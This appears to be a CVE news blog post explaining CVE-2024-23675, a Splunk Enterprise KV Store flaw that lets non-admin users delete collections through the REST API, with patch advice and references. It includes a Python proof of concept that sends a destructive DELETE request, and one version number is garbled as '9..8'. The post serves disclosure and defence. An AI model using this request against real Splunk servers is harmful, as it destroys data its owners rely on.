CVE CyberSecurity Database News

CVE-2024-23675 - Breaking Down the Splunk KV Store REST API Vulnerability (with Exploit Example)

Poster -

---

Splunk is a leader in big data analysis, helping companies monitor, search, and analyze machine-generated data. But even the big players aren’t immune to security flaws. CVE-2024-23675, announced in 2024, exposed a critical vulnerability affecting the key value store (KV Store) in Splunk Enterprise. If you run Splunk versions below 9..8 or 9.1.3, you might be at risk.

This post gives you a straightforward, comprehensive explanation, showcases what’s going wrong with code snippets, and links to official references. Read this and you’ll understand *exactly* what’s at stake—and what to do.

What Is CVE-2024-23675 About?

CVE-2024-23675 is a security vulnerability related to the Splunk KV Store and its REST API. Under certain conditions, normal users (not admins!) using the API could delete entire KV Store collections—critical data that might power your dashboards, searches, or custom Splunk apps.

How Does It Happen?

The core issue is *improper enforcement of permissions* in the REST API for the KV Store. In vulnerable versions, the API lets users send specific DELETE requests to remove entire key-value store collections—even if they’re not supposed to have that power.

The Technical Details

Splunk’s KV Store is basically a MongoDB database sitting behind Splunk, offering app developers flexible structured data storage. Usually, only privileged users (admins, or owners of the collection) can perform destructive actions on collections. But this bug lets any user who can authenticate to the REST API access dangerous endpoints.

The trouble comes with the following REST endpoint

DELETE /servicesNS/<user>/<app>/storage/collections/config/<collection_name>

Expected: Only admins or the collection owner can hit this endpoint and delete a collection.

Reality (in vulnerable versions): Any authenticated user, if they craft this request, could delete any collection the REST API exposes.

Real Exploit Example

> WARNING: Don’t run this on production! It will delete data.
> This is for educational purposes only.

Let’s suppose you’re user1, just a regular Splunk user, and you want to see if you can delete your team’s saved search collection.

Here’s a simple example using Python’s requests library

import requests
from requests.auth import HTTPBasicAuth

splunk_host = 'https://splunk.example.com:8089';
username = 'user1'
password = 'password1'
app = 'search'
collection = 'saved_searches_collection'

# URL for the vulnerable endpoint
url = f'{splunk_host}/servicesNS/{username}/{app}/storage/collections/config/{collection}'

# Perform the DELETE
response = requests.delete(url, auth=HTTPBasicAuth(username, password), verify=False)

if response.status_code == 200:
    print('Collection deleted successfully!')
else:
    print(f'Failed! Status code: {response.status_code}\nResponse: {response.text}')

What happens:
With vulnerable Splunk, *even non-privileged users* can successfully delete a key-value collection with this snippet.

What Should You Do?

Patch, patch, patch!
Upgrade to Splunk Enterprise 9..8 or 9.1.3 (or later). The fixed versions properly enforce permissions, so regular users can no longer delete collections they don’t own.

References and Further Reading

- Splunk Security Advisory: SVD-2024-0602 (CVE-2024-23675)
- Splunk Release Notes - Splunk Enterprise
- MITRE: CVE-2024-23675

Summary

CVE-2024-23675 is a serious bug in some Splunk Enterprise installations. By not checking permissions correctly on REST API endpoints, Splunk allowed authenticated users to delete arbitrary KV Store collections. Patch your Splunk servers as soon as possible, limit API trust broadly, and always keep an eye on your data.

Timeline

Published on: 01/22/2024 21:15:10 UTC
Last modified on: 01/29/2024 18:04:13 UTC